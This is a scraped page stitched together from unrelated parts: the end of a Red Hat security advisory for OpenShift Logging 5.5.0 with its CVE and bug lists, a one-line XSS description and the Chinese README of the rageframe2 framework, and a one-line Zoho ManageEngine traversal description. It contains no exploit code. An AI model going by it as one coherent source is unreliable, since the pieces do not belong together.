LOG-2867 - [fluentd] All logs are sent to application tenant when loki is used as default logstore in CLF.  
LOG-2873 - [Vector] Cannot configure CPU/Memory requests/limits when using Vector as collector.  
LOG-2875 - Seeing a black rectangle box on the graph in Logs view  
LOG-2876 - The link to the 'Container details' page on the 'Logs' screen throws error  
LOG-2877 - When there is no query entered, seeing error message on the Logs view  
LOG-2882 - RefreshIntervalDropdown and TimeRangeDropdown always set back to its original values when switching between pages in 'Logs' screen

6. References:

https://access.redhat.com/security/cve/CVE-2021-38561  
https://access.redhat.com/security/cve/CVE-2022-0759  
https://access.redhat.com/security/cve/CVE-2022-1012  
https://access.redhat.com/security/cve/CVE-2022-1292  
https://access.redhat.com/security/cve/CVE-2022-1586  
https://access.redhat.com/security/cve/CVE-2022-1785  
https://access.redhat.com/security/cve/CVE-2022-1897  
https://access.redhat.com/security/cve/CVE-2022-1927  
https://access.redhat.com/security/cve/CVE-2022-2068  
https://access.redhat.com/security/cve/CVE-2022-2097  
https://access.redhat.com/security/cve/CVE-2022-21698  
https://access.redhat.com/security/cve/CVE-2022-30631  
https://access.redhat.com/security/cve/CVE-2022-32250  
https://access.redhat.com/security/updates/classification/#important

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYv5/w9zjgjWX9erEAQhRBBAAiZe24VtCQruCG/MvGEOowBvHf/YNANlR  
N6WAw2VezEfvFkG7z599MWZVWz2jnZO6cn9i+CoNDanAmItPJ8ljK4sitrP2ywrG  
OKwqIa4DPrywFFTSMxemB604ewE0cvXifuqG5bQDn+GvndiV/u/XaVTYZseY1P5X  
8ZIJ20cxROOE9pg0/3eya27edZxDrgWx6BtzSEZw47ReV3Dogqy+KzRCAAoN+pE5  
g2t/E0u0Ypmjil9Ttsop/ejUg/iz8UTGtua4m1nzhZrsoE84p5xIgvCEkYlh3OrD  
tfawpj1r9Avcjk4zbZkAe/enSQZQv0iWD792SoP7/ddX5tIu05ArvPWj/NvN/rI4  
dFzMe2UmezuS2EQpzaWOug2xSQUbR1hI+Y4cy0YOHuwzeaMeoHSbNYTJmOxKR0v1  
44a9oSBku+Xfk8nUNqS+9oq0z3DlAWt2BjbfrJCbSjZQdOUOIGM95L3ClrXY9LYF  
PT5v+h2W4myonj6HVhkv+Wy7aRbYQ7Qhk/3AaN7Dz5soBSNK4exvOzWXGuf/BdSf  
XFef6O87ipZveHQYmTfH+t8aJV1plEVTrm8pyz2EfzCv1Fnhjn0rvbGZAFBlvqW+  
vhxoj505RQBBhcno16V1zczdd8KsiqY7aZniTuh2DQAVvNhqsHgn8rvQ7HJlExun  
eIFVKOxx310=ynB/  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6051-01

An update is now available for RHOL-5.5-RHEL-8.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS
* CVE-2022-0759: kubeclient: kubeconfig parsing error can lead to MITM attacks
* CVE-2022-21698: prometheus/client_golang: Denial of service using InstrumentHandlerCounter
* CVE-2022-30631: golang: compress/gzip: stack exhaustion in Reader.Read


Issued:

2022-08-18

Updated:

2022-08-18

**RHSA-2022:6051 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: Logging Subsystem 5.5.0 - Red Hat OpenShift security update

**Type/Severity**

Security Advisory: Important

**Topic**

An update is now available for RHOL-5.5-RHEL-8.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Logging Subsystem 5.5.0 - Red Hat OpenShift  

Security Fix(es):  

*   kubeclient: kubeconfig parsing error can lead to MITM attacks (CVE-2022-0759)
*   golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)
*   golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)
*   prometheus/client\_golang: Denial of service using InstrumentHandlerCounter (CVE-2022-21698)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Affected Products**

*   Logging Subsystem for Red Hat OpenShift 5 x86\_64
*   Logging Subsystem for Red Hat OpenShift for IBM Power, little endian 5 ppc64le
*   Logging Subsystem for Red Hat OpenShift for IBM Z and LinuxONE 5 s390x
*   Logging Subsystem for Red Hat OpenShift for ARM 64 5 aarch64

**Fixes**

*   BZ - 2045880 - CVE-2022-21698 prometheus/client\_golang: Denial of service using InstrumentHandlerCounter
*   BZ - 2058404 - CVE-2022-0759 kubeclient: kubeconfig parsing error can lead to MITM attacks
*   BZ - 2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS
*   BZ - 2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read
*   LOG-2649 - Level Critical should match the beginning of the line as the other levels
*   LOG-2656 - Logging uses deprecated v1beta1 apis
*   LOG-2664 - Deprecated Feature logs causing too much noise
*   LOG-2665 - \[Logging 5.5\] Sometimes collector fails to push logs to Elasticsearch cluster
*   LOG-2693 - Integration with Jaeger fails for ServiceMonitor
*   LOG-2700 - \[Vector\] vector container can't start due to "unknown field \`pod\_annotation\_fields\`" .
*   LOG-2703 - Collector DaemonSet is not removed when CLF is deleted for fluentd/vector only CL instance
*   LOG-2725 - Upgrade logging-eventrouter Golang version and tags
*   LOG-2731 - CLO keeps reporting \`Reconcile ServiceMonitor retry error\` and \`Reconcile Service retry error\` after creating clusterlogging.
*   LOG-2732 - Prometheus Operator pod throws 'skipping servicemonitor' error on Jaeger integration
*   LOG-2742 - unrecognized outputs when use the sts role secret
*   LOG-2746 - CloudWatch forwarding rejecting large log events, fills tmpfs
*   LOG-2749 - OpenShift Logging Dashboard for Elastic Shards shows "active\_primary" instead of "active" shards.
*   LOG-2753 - Update Grafana configuration for LokiStack integration on grafana/loki repo
*   LOG-2763 - \[Vector\]{Master} Vector's healthcheck fails when forwarding logs to Lokistack.
*   LOG-2764 - ElasticSearch operator does not respect referencePolicy when selecting oauth-proxy image
*   LOG-2765 - ingester pod can not be started in IPv6 cluster
*   LOG-2766 - \[vector\] failed to parse cluster url: invalid authority IPv6 http-proxy
*   LOG-2772 - arn validation failed when role\_arn=arn:aws-us-gov:xxx
*   LOG-2773 - No cluster-logging-operator-metrics service in logging 5.5
*   LOG-2778 - \[Vector\] \[OCP 4.11\] SA token not added to Vector config when connecting to LokiStack instance without CLF creds secret required by LokiStack.
*   LOG-2784 - Japanese log messages are garbled at Kibana
*   LOG-1415 - Allow users to tune fluentd
*   LOG-1539 - Events and CLO csv are not collected after running \`oc adm must-gather --image=$downstream-clo-image \`
*   LOG-1713 - Reduce Permissions granted for prometheus-k8s service account
*   LOG-2063 - Collector pods fail to start when a Vector only Cluster Logging instance is created.
*   LOG-2134 - The infra logs are sent to app-xx indices
*   LOG-2159 - Cluster Logging Pods in CrashLoopBackOff
*   LOG-2165 - \[Vector\] Default log level debug makes it hard to find useful error/failure messages.
*   LOG-2167 - \[Vector\] Collector pods fails to start with configuration error when using Kafka SASL over SSL
*   LOG-2169 - \[Vector\] Logs not being sent to Kafka with SASL plaintext.
*   LOG-2172 - \[vector\]The openshift-apiserver and ovn audit logs can not be collected.
*   LOG-2242 - Log file metric exporter is still following /var/log/containers files.
*   LOG-2243 - grafana-dashboard-cluster-logging should be deleted once clusterlogging/instance was removed
*   LOG-2264 - Logging link should contain an icon
*   LOG-2274 - \[Logging 5.5\] EO doesn't recreate secrets kibana and kibana-proxy after removing them.
*   LOG-2276 - Fluent config format is hard to read via configmap
*   LOG-2290 - ClusterLogging Instance status in not getting updated in UI
*   LOG-2291 - \[release-5.5\] Events listing out of order in Kibana 6.8.1
*   LOG-2294 - \[Vector\] Vector internal metrics are not exposed via HTTPS due to which OpenShift Monitoring Prometheus service cannot scrape the metrics endpoint.
*   LOG-2300 - \[Logging 5.5\]ES pods can't be ready after removing secret/signing-elasticsearch
*   LOG-2303 - \[Logging 5.5\] Elasticsearch cluster upgrade stuck
*   LOG-2308 - configmap grafana-dashboard-elasticsearch is being created and deleted continously
*   LOG-2333 - Journal logs not reaching Elasticsearch output
*   LOG-2337 - \[Vector\] Missing @ prefix from the timestamp field in log record.
*   LOG-2342 - \[Logging 5.5\] Kibana pod can't connect to ES cluster after removing secret/signing-elasticsearch: "x509: certificate signed by unknown authority"
*   LOG-2384 - Provide a method to get authenticated from GCP
*   LOG-2411 - \[Vector\] Audit logs forwarding not working.
*   LOG-2412 - CLO's loki output url is parsed wrongly
*   LOG-2413 - PriorityClass cluster-logging is deleted if provide an invalid log type
*   LOG-2418 - EO supported time units don't match the units specified in CRDs.
*   LOG-2440 - \[loki-operator\] Live tail of logs does not work on OpenShift
*   LOG-2444 - The write index is removed when \`the size of the index\` > \`diskThresholdPercent% \* total size\`.
*   LOG-2460 - \[Vector\] Collector pods fail to start on a FIPS enabled cluster.
*   LOG-2461 - \[Vector\] Vector auth config not generated when user provided bearer token is used in a secret for connecting to LokiStack.
*   LOG-2463 - Elasticsearch operator repeatedly prints error message when checking indices
*   LOG-2474 - EO shouldn't grant cluster-wide permission to system:serviceaccount:openshift-monitoring:prometheus-k8s when ES cluster is deployed. \[openshift-logging 5.5\]
*   LOG-2522 - CLO supported time units don't match the units specified in CRDs.
*   LOG-2525 - The container's logs are not sent to separate index if the annotation is added after the pod is ready.
*   LOG-2546 - TLS handshake error on loki-gateway for FIPS cluster
*   LOG-2549 - \[Vector\] \[master\] Journald logs not sent to the Log store when using Vector as collector.
*   LOG-2554 - \[Vector\] \[master\] Fallback index is not used when structuredTypeKey is missing from JSON log data
*   LOG-2588 - FluentdQueueLengthIncreasing rule failing to be evaluated.
*   LOG-2596 - \[vector\]the condition in \[transforms.route\_container\_logs\] is inaccurate
*   LOG-2599 - Supported values for level field don't match documentation
*   LOG-2605 - $labels.instance is empty in the message when firing FluentdNodeDown alert
*   LOG-2609 - fluentd and vector are unable to ship logs to elasticsearch when cluster-wide proxy is in effect
*   LOG-2627 - containers violate PodSecurity -- Loki
*   LOG-2439 - Telemetry: the managedStatus&healthStatus&version values are wrong
*   LOG-2619 - containers violate PodSecurity -- Log Exporation
*   LOG-2793 - \[Vector\] OVN audit logs are missing the level field.
*   LOG-2864 - \[vector\] Can not sent logs to default when loki is the default output in CLF
*   LOG-2867 - \[fluentd\] All logs are sent to application tenant when loki is used as default logstore in CLF.
*   LOG-2873 - \[Vector\] Cannot configure CPU/Memory requests/limits when using Vector as collector.
*   LOG-2875 - Seeing a black rectangle box on the graph in Logs view
*   LOG-2876 - The link to the 'Container details' page on the 'Logs' screen throws error
*   LOG-2877 - When there is no query entered, seeing error message on the Logs view
*   LOG-2882 - RefreshIntervalDropdown and TimeRangeDropdown always set back to its original values when switching between pages in 'Logs' screen

**CVEs**

*   CVE-2021-38561
*   CVE-2022-0759
*   CVE-2022-1012
*   CVE-2022-1292
*   CVE-2022-1586
*   CVE-2022-1785
*   CVE-2022-1897
*   CVE-2022-1927
*   CVE-2022-2068
*   CVE-2022-2097
*   CVE-2022-21698
*   CVE-2022-30631
*   CVE-2022-32250

**Logging Subsystem for Red Hat OpenShift 5**

SRPM

x86\_64

**Logging Subsystem for Red Hat OpenShift for IBM Power, little endian 5**

SRPM

ppc64le

**Logging Subsystem for Red Hat OpenShift for IBM Z and LinuxONE 5**

SRPM

s390x

**Logging Subsystem for Red Hat OpenShift for ARM 64 5**

SRPM

aarch64

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2022:6051: Red Hat Security Advisory: Logging Subsystem 5.5.0 - Red Hat OpenShift security update

An issue was discovered in rageframe2 2.6.37. There is a XSS vulnerability in the user agent related parameters of the info.php page.

**RageFrame 2.0**

重量级全栖框架，为二次开发而生

**前言**

这是一款现代化、快速、高效、便捷、灵活、方便扩展的应用开发骨架。

RageFrame 创建于 2016 年 4 月 16 日，一个基于 Yii2 高级框架的快速开发引擎，目前正在成长中，目的是为了集成更多的基础功能，不再为相同的基础功能重复制造轮子，开箱即用，让开发变得更加简单。  
2018 年 9 月 10 日 2.0 版本正式上线，经过 1.0 版本一年多的开源反馈磨合，以更加优秀的形态出现。对 1.0 的版本进行了重构优化完善，更好的面向开发者进行二次开发。2.3.x 版本更是优化了底层突出了服务层，分离业务逻辑，支持多商户。

**特色**

*   极强的可扩展性，应用化，模块化，插件化机制敏捷开发。
*   极致的插件机制，微核架构，良好的功能延伸性，功能之间是隔离，可定制性高，可以渐进式地开发，逐步增加功能，安装和卸载不会对原来的系统产生影响,强大的功能完全满足各阶段的需求，支持用户多端访问(后台、微信、Api、前台等)。
*   极完善的 RBAC 权限控制管理、无限父子级权限分组、可自由分配子级权限，且按钮/链接/自定义内容/插件等都可加入权限控制。
*   只做基础底层内容，不会在上面开发过多的业务内容，满足绝大多数的系统二次开发。
*   多入口模式，多入口分为 Backend (后台)、Merchant (商户端)、Frontend (PC前端)、Html5 (手机端)、Console (控制台)、Api (对内接口)、OAuth2 Server (对外接口)、MerApi (商户接口)、Storage (静态资源)，不同的业务，不同的设备，进入不同的入口。
*   对接微信公众号且支持小程序，使用了一款优秀的微信非官方 SDK Easywechat 4.x，开箱即用，预置了绝大部分功能，大幅度的提升了微信开发效率。
*   整合了第三方登录，目前有 QQ、微信、微博、GitHub 等等。
*   整合了第三方支付，目前有微信支付、支付宝支付、银联支付，二次封装为网关多个支付一个入口一个出口。
*   整合了 RESTful API，支持前后端分离接口开发和 App 接口开发，可直接上手开发业务。
*   一键切换云存储，本地存储、腾讯 COS、阿里云 OSS、七牛云存储都可一键切换，且增加其他第三方存储也非常方便。
*   全面监控系统报错，报错日志写入数据库，方便定位错误信息。支持直接钉钉提醒。
*   快速高效的 Servises (服务层)，遵循 Yii2 的懒加载方式，只初始化使用到的组件服务。
*   丰富的表单控件(时间、日期、时间日期、日期范围选择、颜色选择器、省市区三级联动、省市区勾选、单图上传、多图上传、单文件上传、多文件上传、百度编辑器、百度图表、多文本编辑框、地图经纬度选择器、图片裁剪上传、TreeGrid、JsTree、Markdown 编辑器)和组件(二维码生成、Curl、IP地址转地区)，快速开发，不必再为基础组件而担忧。
*   快速生成 CURD ,无需编写代码，只需创建表设置路径就能出现一个完善的 CURD ,其中所需表单控件也是勾选即可直接生成。
*   正常开发只需要开发商户端，没有 Saas 的时候商户端就是总后台，有了 Saas，商户端就是子后台
*   完善的文档和辅助类，方便二次开发与集成。

**思维导图**

**应用架构流程**

**系统快照**

【系统 - 首页】  【系统 - 配置管理】  【系统 - 角色编辑】  【系统 - 日志统计】  【会员 - 信息】  【微信 - 自定义菜单】  【插件模块 - 列表】  【插件模块 - 文章模块】  【插件模块 - 系统监控】 

**开始之前**

*   具备 PHP 基础知识
*   具备 Yii2 基础开发知识
*   具备 开发环境的搭建
*   仔细阅读文档，一般常见的报错可以自行先解决，解决不了再来提问
*   如果要做小程序或微信开发需要明白微信接口的组成，自有服务器、微信服务器、公众号（还有其它各种号）、测试号、以及通信原理（交互过程）
*   如果需要做接口开发(RESTful API)了解基本的 HTTP 协议，Header 头、请求方式（GET\POST\PUT\PATCH\DELETE）等
*   能查看日志和 Debug 技能
*   一定要仔细走一遍文档

**Demo**

地址：http://demo2.rageframe.com/backend  
账号：demo  
密码：123456

**官网**

http://www.rageframe.com

**文档**

安装文档 · 本地文档 · 更新历史 · 常见问题

**插件**

*   微商城：https://github.com/jianyan74/TinyShop
*   微信公众号：https://github.com/jianyan74/Wechat
*   商家管理：https://github.com/jianyan74/Merchants
*   在线文档：https://github.com/jianyan74/RfOnlineDoc

**问题反馈**

在使用中有任何问题，欢迎反馈给我，可以用以下联系方式跟我交流

QQ群1：655084090 (2000人快满)  
QQ群2：1148015133 (新群)

GitHub：https://github.com/jianyan74/rageframe2/issues

**特别鸣谢**

感谢以下的项目，排名不分先后

Yii：http://www.yiiframework.com

EasyWechat：https://www.easywechat.com

Bootstrap：http://getbootstrap.com

AdminLTE：https://adminlte.io

...

**版权信息**

RageFrame 遵循 Apache2 开源协议发布，并提供免费使用。

本项目包含的第三方源码和二进制文件之版权信息另行标注。

版权所有Copyright © 2016-2020 by RageFrame www.rageframe.com

All rights reserved。

CVE-2022-36530: GitHub - jianyan74/rageframe2: 一个基于Yii2高级框架的快速开发应用引擎

Directory Traversal vulnerability ZDBQAREFSUBDIR parameter in /zropusermgmt API in Zoho ManageEngine Analytics Plus before 4350 allows remote attackers to run arbitrary code.

Tag

#oauth